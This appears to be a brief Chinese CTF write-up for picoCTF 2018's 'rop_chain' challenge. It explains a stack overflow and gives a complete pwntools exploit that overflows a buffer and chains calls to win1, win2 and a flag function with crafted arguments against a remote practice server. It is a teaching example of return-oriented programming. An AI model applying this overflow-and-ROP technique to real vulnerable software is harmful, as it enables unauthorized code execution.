picoctf_2018_rop_chain
查看保护
有溢出。
发现了一个flag函数,只需要满足win1不为0和win2不为0和a1=0xdeadbaad即可get flag。
又发现了两个函数,分析一下即可知道是设置win1和win2值的函数
rop的话先放win1这个函数,接着放win2这个函数,win2有参数,满足a1=0xbaaaaad就行。
最后win1和win2都不为0之后flag这个函数有一个a1参数,让a1参数过一下if就行。
构造rop的话注意一下32位的调用:调用函数地址->函数的返回地址->参数n->参数n-1…->参数1
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 28335)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
get_flag = 0x804862B
win2_addr = 0x80485D8
win1_addr = 0x80485CB
p1 = b'a' * (0x18 + 4)
p1 += p32(win1_addr) + p32(win2_addr)
p1 += p32(get_flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
r.sendline(p1)
r.interactive()